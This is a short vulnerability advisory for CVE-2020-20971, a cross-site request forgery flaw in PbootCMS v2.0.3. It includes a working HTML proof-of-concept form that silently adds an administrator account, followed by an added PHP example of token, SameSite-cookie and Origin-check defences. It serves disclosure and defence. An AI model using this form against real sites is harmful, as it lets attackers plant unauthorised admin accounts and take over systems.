Security
Headlines
CVE-2020-20971: There is a CSRF vulnerability that can add the administrator account · Issue #1 · TplusSs/PbootCMS

Cross Site Request Forgery (CSRF) vulnerability in PbootCMS v2.0.3 via /admin.php?p=/User/index.

CVE
#csrf #vulnerability #php
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://pboot.com:12345/admin.php?p=/User/add" method="POST">
      <input type="hidden" name="formcheck" value="d48ee9bffae5f7fb7022ea1e7dd4a224" />
      <input type="hidden" name="username" value="TplusSs" />
      <input type="hidden" name="realname" value="asd" />
      <input type="hidden" name="password" value="123" />
      <input type="hidden" name="rpassword" value="123" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="roles&#91;0&#93;" value="R101" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Then open the “/admin.php?p=/User/index” page to see the added system administrator.
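Defensive counterpart to the PoC above, added here as an illustration and not PbootCMS's own code: a session-bound, single-use token for the `formcheck` field plus an Origin check, in a hypothetical handler for the `/User/add` route. The cookie flags, function names and handler shape are assumptions.

```php
<?php
// Added example, not PbootCMS code. A "formcheck" value that a third-party page
// can know or reuse protects nothing; one tied to the victim's session does.

// Lax SameSite: a cross-site POST from another origin is sent without the
// session cookie, so there is no stored token for the attacker's value to match.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// Issue a fresh token and remember it server-side; called when rendering the form.
function csrf_token(): string {
    $token = bin2hex(random_bytes(32));
    $_SESSION['formcheck'] = $token;
    return $token;
}

// Hidden field for the form, replacing the fixed value seen in the PoC (hex token, no escaping needed).
function csrf_field(): string {
    return '<input type="hidden" name="formcheck" value="' . csrf_token() . '" />';
}

// Verify the submitted token: present, equal in constant time, and used once.
function csrf_verify(?string $submitted): bool {
    $expected = $_SESSION['formcheck'] ?? null;
    unset($_SESSION['formcheck']);              // single use, so a replay fails
    if ($expected === null || $submitted === null) {
        return false;
    }
    return hash_equals($expected, $submitted);  // constant-time comparison
}

// Defence in depth: browsers add an Origin header to cross-site POSTs.
function same_origin(): bool {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '';
    if ($origin === '') {
        return true;  // header absent; the token check still applies
    }
    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
    return $origin === $scheme . '://' . ($_SERVER['HTTP_HOST'] ?? '');
}

// Hypothetical handler for the admin.php?p=/User/add route targeted by the PoC.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!same_origin() || !csrf_verify($_POST['formcheck'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: CSRF check failed');
    }
    // Only now create the user from $_POST['username'], $_POST['roles'], ...
}
```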
